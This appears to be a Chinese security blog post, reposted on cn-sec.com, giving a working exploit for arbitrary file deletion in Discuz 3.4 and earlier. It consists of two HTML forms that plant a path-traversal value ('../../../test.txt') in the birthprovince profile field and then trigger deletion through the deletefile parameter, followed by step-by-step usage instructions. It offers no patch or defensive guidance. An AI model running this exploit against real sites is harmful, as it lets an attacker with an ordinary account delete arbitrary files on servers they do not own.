discuz 任意文件删除

admin 2023年12月15日00:50:09评论6 views字数 798阅读2分39秒阅读模式

漏洞影响范围 discuz <= 3.4

exp

<form action="http://www.xxx.com/home.php?mod=spacecp&ac=profile&op=base" method="POST" enctype="multipart/form-data">
<input type="text"name="birthprovince" id="text" value="../../../test.txt" />
<input type="text"name="formhash" value="de746a38"/></p>
<input type="text"name="profilesubmit" value="1"/></p>
<input type="submit"value="Submit" />
</form>

<br />

<form action="http://www.xxx.com/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file"name="birthprovince" id="file" />
<input type="text"name="formhash" value="de746a38"/></p>
<input type="text"name="profilesubmit" value="1"/></p>
<input type="submit"value="Submit" />
</form>

首先在前台注册账号

个人中心 修改个人资料

http://cn-sec.com/wp-content/uploads/2023/12/20231214161921-99.jpg

右键查看 formhash

http://cn-sec.com/wp-content/uploads/2023/12/20231214161921-4.jpg

修改 exp 中的网址

填上要删除的文件 formhash 选择文件

两个 submit 分别提交

http://cn-sec.com/wp-content/uploads/2023/12/20231214161921-1.jpg

- By:X1r0z[exp10it.cn]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月15日00:50:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   discuz 任意文件删除http://cn-sec.com/archives/2301463.html

发表评论

匿名网友 填写信息